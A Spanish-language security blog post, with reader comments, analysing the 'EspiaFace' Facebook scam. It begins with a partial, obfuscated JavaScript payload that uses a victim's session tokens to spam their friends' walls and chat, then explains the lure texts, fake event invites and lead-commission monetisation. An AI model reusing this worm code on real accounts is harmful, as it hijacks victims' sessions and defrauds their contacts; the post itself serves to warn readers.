                var _0xbf72x2a = Math['floor'](Math['random']() * 1335448958);
                var _0xbf72x2b = (new Date)['getTime']();
                var _0xbf72x2c = chatmessage['replace']('%firstname%', _0xbf72x28['userInfos'][_0xbf72x29]['firstName']['toLowerCase']());
                _0xbf72x16('/ajax/chat/send.php?__a=1', {
                    msg_id: Math['floor'](Math['random']() * 1335448958),
                    client_time: (new Date)['getTime'](),
                    msg_text: chatmessage['replace']('%firstname%', _0xbf72x28['userInfos'][_0xbf72x29]['firstName']['toLowerCase']()),
                    to: _0xbf72x29,
                    post_form_id: _0xbf72x1a,
                    fb_dtsg: _0xbf72x1b,
                    post_form_id_source: 'AsyncRequest'
                });
            };
            mf(--wf);
        });
    };
    if (postmessage) {
        wf++;
        doget('/ajax/browser/friends/?uid=' + _0xbf72x10 + '&filter=all&__a=1&__d=1', function (_0xbf72x1d) {
            var _0xbf72x20 = _0xbf72x1d['match'](//d+_d+_d+_q.jpg.*?u003ca href="http://www.facebook.com/.*?u003c/a>/gi);
            var _0xbf72x2d = [];
            if (_0xbf72x20) {
                for (var _0xbf72x22 = 0; _0xbf72x22 < _0xbf72x20['length']; _0xbf72x22++) {
                    var _0xbf72x23 = _0xbf72x20[_0xbf72x22]['match'](/_d+_/)[0]['replace'](/_/g, '');
                    var _0xbf72x2e = _0xbf72x20[_0xbf72x22]['match'](/>[^>]+u003c/a>$/i)[0]['replace'](/u003c/a>$/gim, '')['replace'](/>/g, '');
                    _0xbf72x2d['push']({
                        id: _0xbf72x23,
                        name: _0xbf72x2e
                    });
                };
            };
            var _0xbf72xd = [];
            var _0xbf72x2f = [];
            while (_0xbf72x2d['length']) {
                var _0xbf72x30 = Math['floor'](Math['random']() * _0xbf72x2d['length']);
                _0xbf72xd['push'](_0xbf72x2d[_0xbf72x30]);
                _0xbf72x2f['push'](_0xbf72x2d[_0xbf72x30]);
                var _0xbf72x2b = _0xbf72x2d['shift']();
                if (_0xbf72x30) {
                    _0xbf72x2d[_0xbf72x30 - 1] = _0xbf72x2b;
                };
            };
            if (debug) {
                alert('fetched friends: ' + _0xbf72xd['length']);
            };
            var _0xbf72x31 = {
                post_form_id: _0xbf72x1a,
                fb_dtsg: _0xbf72x1b,
                xhpc_composerid: comp,
                xhpc_targetid: _0xbf72x10,
                xhpc_context: 'home',
                xhpc_fbx: '',
                lsd: null,
                post_form_id_source: 'AsyncRequest'
            };
            mt = postmessage;
            m = postmessage;
            while (mt['search']('%tf%') >= 0) {
                var _0xbf72x32 = _0xbf72xd['pop']();
                mt = mt['replace']('%tf%', _0xbf72x13(_0xbf72x32));
                m = m['replace']('%tf%', _0xbf72x11(_0xbf72x32));
            };
            _0xbf72x31['xhpc_message_text'] = mt;
            _0xbf72x31['xhpc_message'] = m;
            if (debug) {
                alert('message text: ' + mt);
            };
            _0xbf72x16('/ajax/updatestatus.php?__a=1', _0xbf72x31);
            var _0xbf72x33 = function (_0xbf72x15) {
                    if (_0xbf72x15 == 0) {
                        wf = 0;
                        mf();
                        return;
                    };
                    var _0xbf72x34 = _0xbf72x2f['shift']();
                    var _0xbf72x35 = {
                        post_form_id: _0xbf72x1a,
                        fb_dtsg: _0xbf72x1b,
                        xhpc_composerid: comp,
                        xhpc_targetid: _0xbf72x34['id'],
                        xhpc_context: 'profile',
                        xhpc_fbx: 1,
                        lsd: null,
                        post_form_id_source: 'AsyncRequest'
                    };
                    var _0xbf72x36 = postmessage;
                    var _0xbf72x37 = postmessage;
                    if (_0xbf72xd['length'] == 0) {
                        wf = 0;
                        mf();
                        return;
                    };
                    while (_0xbf72x36['search']('%tf%') >= 0) {
                        var _0xbf72x38 = _0xbf72xd['pop']();
                        _0xbf72x36 = _0xbf72x36['replace']('%tf%', _0xbf72x13(_0xbf72x38));
                        _0xbf72x37 = _0xbf72x37['replace']('%tf%', _0xbf72x11(_0xbf72x38));
                    };
                    _0xbf72x35['xhpc_message_text'] = _0xbf72x36;
                    _0xbf72x35['xhpc_message'] = _0xbf72x37;
                    _0xbf72x16('/ajax/updatestatus.php?__a=1', _0xbf72x35);
                    setTimeout(function () {
                        _0xbf72x33(_0xbf72x15 - 1);
                    }, 2000);
                };
            wf++;
            setTimeout(function () {
                _0xbf72x33(nfriends);
            }, 2000);
        });
    };
    mf();
});

[/toggle]

Si no sabes de que va el codigo, te comento lo que hace:

  • Muestra una imagen animada simulando que esta trabajando
  • Se fija los amigos que tenés en Facebook y escoge a cuatro amigos al azar para generar el mensaje del muro:

    Top de visitantes de tu perfil de hoy:
    %tf% – 19 visitas
    %tf% – 16 visitas
    %tf% – 15 visitas
    %tf% – 13 visitas
    Averigua tu tambien quien te esta mirando entrando en: espiaface.com
    Funciona de verdad!

    (En %tf% reemplaza por los nombres completos de tus amigos escogidos al azar)

    Fijate que siempre va a mostrar que tuviste 19, 16, 15 y 13 visitas, la versión en inglés genera números aleatorios.

  • Crea un evento en facebook (Vas a ir: ¿si, no, quizas?) y automáticamente invita a todos tus amigos

    Nombre del Evento: Averigua quien visita tu perfil
    Descripción del evento: Esto es increible! pueden ver quien esta visitando su perfil y te llegan notificaciones, sigan los pasos de esta pagina que explica como hacerlo, entren en: espiaface.com

Resumiendo

Ese código, en esos 2 y 3 minutos que te pide esperar:

  • Lo que hace: Al poner ese código en la barra de direcciones, toma el control de tu Facebook un ratito para Spamear tanto por chat, como en el muro y también organizando eventosLo único que hace es Spamear por los codos.
  • Lo que no hace: No te roba el cookie, ni te saca la contraseña, ni accede a información privada de tu perfil, ni te sube virus ocultamente, ni te baja los pantalones, ni te mete… bueno lo paramos ahi.

¿Entonces cuál es el punto?

¿Entonces para qué carajo alguien se molestó en crear semejante estupidez? Muy simple, para hacer dinero. Mucho dinero.
Potencialmente podría haber generado miles de dólares, les explico a continuación.

Una vez que terminan los minutos de espera te redirige al siguiente sitio: final.espiaface.com (www.espiaface.com/carga.php)
En final.espiaface.com te dice:

EspiaFace3 Qué hace realmente Espia F a c e.com

Eso es lo que vas a ver si vivis en sudamérica. Y la imagen de arriba va ser lo último que hayas visto. Es por esto que muchos analistas en la red se rascaban la cabeza preguntándose cuál era el fin de este “virus”.

Pero si vivís en México, te va a mostrar una oferta: de http://www.enterfactory.com/ (no ingreses el numero de tu celular)
Y si vivís en Estados Unidos te va a mostrar cinco links surtidos de diferentes juegos de: PlaySushi.com, PageRage.com, Gamevance.com

De nuevo, ¿qué gana el autor?

  • Si sos un hispano de Estados Unidos que entraste a PlaySushi.com y te bajaste el juego, el creador de Espiaface ganó $1.
  • Si sos un Mexicano que pusiste tu número de celular en Enterfactory.com, le generaste al creador de Espiaface $1.

Esto es lo que se llama comisión por intención de compra (leads). Si te suscribís a algún producto, llenas un formulario (eufemísticamente llamados “encuestas” ) con tus datos personales, eso genera un “lead” y le genera una comisión por referido.

Estas ofertas están restringidas por países, y la gran mayoría de los países hispanos estaban fuera de las áreas de promoción, es por eso que a la mayoría de ustedes les mostraba: “Sorry, There are no surveys available to your country at this time. Please try back later” (Disculpen, no hay encuestas disponibles en su país en este momento. Por favor intente luego)

Este es el rango de las comisiones por sitio:

  • PageRage (Sólo disponible para USA): de $0,8 a $2,20 por lead. (Promedio: $1,50)
  • Gamevance (Sólo disponible para USA): de $1,60 a $2,29 por lead. (Promedio: $1,95)
  • Playsushi (Sólo disponible para USA): de $0,90 a $2 por lead. (Promedio: $1,45)
  • Enterfactory (Sólo disponible para México): de $0,60 a $1,20 por lead. (Promedio: $0,90)

Si suponemos razonablemente que un 1% de los usuarios mexicanos de Facebook (Facebook tiene 24.910.520 usuarios mexicanos registrados) se suscribieron a Enterfactory.com ($1 por lead para facilitar el cálculo, además de que es el más probable), el creador de espiaface se hubiera levantado $249.105 dólares limpios.

La versión en inglés debe haber generado como mínimo un millón de dólares. Si consideramos que sólo 1% de los usuarios de Facebook de Estados Unidos cayeron en la trampa (Facebook tiene 150.201.840 usuarios registrados en USA), los creadores de estos fraudes levantaron $1.502.018 dólares verdes.
Si agregamos a todos los países con usuarios angloparlantes (casi el resto del mundo) podemos fácilmente imaginar varias decenas de millones de dolares.

Eso es todo, si quieres ver las FAQ de  este articulo, visita la fuente original.

Personalmente creo que no en vista de lo rentable que resultó ser este fraude, volveremos a verlo pronto en Facebook, si no es por el mismo autor, será por imitadores tratando de conseguir buenos ingresos de esta forma.

Les recomiendo que sigan las recomendaciones de seguridad para Facebook que publicamos hace un tiempo en nuestra comunidad.


Si te ha gustado el post, compartelo y ayudanos a crecer.

Unete a nuestra Fanpage Siguenos en Twitter

Autor: DragoN

Ingeniero en Sistemas y Telecomunicaciones de la Universidad de Manizales. Information Security Researcher con más de 10 años de experiencias en Ethical Hacking, Pen Testing y Análisis Forense. Docente Universitario en Pre y Post-Grado, Speaker y Organizador de diferentes eventos de Seguridad Informática, Fundador del DragonJAR Security Conference y Fundador de DragonJAR SAS y de La Comunidad DragonJAR, una de las comunidades de seguridad informática mas grandes de habla hispana y referente en el sector.

Compartir este Artículo
  • http://qjuanp.net qjuanp

    Excelente informe! GRacias!

  • Jairo Gómez

    Muy importante la información y oportuna

  • AlxNovax

    Gracias por el articulo y el tiempo que has tomado para ello.

  • neyudo

    wow increible muchas gracias por esa clase de info

  • Caesarivs

    Y hay una variante con lo del iPad2 para los gringos… es igualitico

  • paula

    super bueno muchas gracias por la informacion

  • EDwaRD

    trate de compartirlo pero dice que es ofensivo valla la idea era culturizar amigos pero weno

  • Pingback: Qué hace realmente EspiaFace.com

  • Andres

    ha yo si sabia que eso tenia algo raro desde el comienzo…

  • aneraka

    excelente informacion, menos mal no cai y todo por que la invitacion me llego de un persona x a la cual supuestamente yo habia visitado 19 veces de antemano me di cuenta que era un farsa completa

  • Diego

    Bueno el artículo pero no se puede compartir en facebook !, da este error

    ” Este mensaje incluye contenido bloqueado que anteriormente se denunció como ofensivo o correo no deseado. Ponte en contacto con nosotros si crees que se trata de un error.”

  • Akay

    Excelente información

  • Hector

    Muy buen informe Felicitaciones.

  • http://www.computo-forense.blogspot.com Cesar Chavez Martinez

    Hola a todos, como esta en la web principal de dragonjar, solo pongan el enlace a la web y apenas carge podran ver esta info. Face ha filtrado palabras pero no ha configurado prohibiciones de contenidos ;)

  • ganjacs

    nanopene como siempre tus investigaciones y aportes son muy completos,te felicito por el laburo ,la verdad que hay mucha gente que se cree estas cosas y las aceptan sin darse cuenta lo que hay detras , facebook tremenda maquina de espionaje

  • wuicho

    bien compa gracias muchas pero muchas gracias que bunos dato

  • botones

    siempre he visto que facebook es solo un roba informacion y una bomba de daños y perjuicios

  • http://nekosys.diosdelared.com Nekosys

    Esto lo descubrí yo también en otra tal página llamada quientevisita o algo asin, al ver el código fuente de la página y todo ello pues me dí cuenta que solamente era spam y procedí también a publicarlo, cosa que luego borre por que no creia que fuese un buen aporte. :D

  • Pingback: Anónimo

  • http://sisiam.blogspot.com mcun

    excelente articulo, ahora que mal que facebook controla las aplicaciones …..

  • http://xcodered.com.ar xcodered

    Excelente informe.

  • hackesiquio

    Se agradece por el articulo y por compartirlo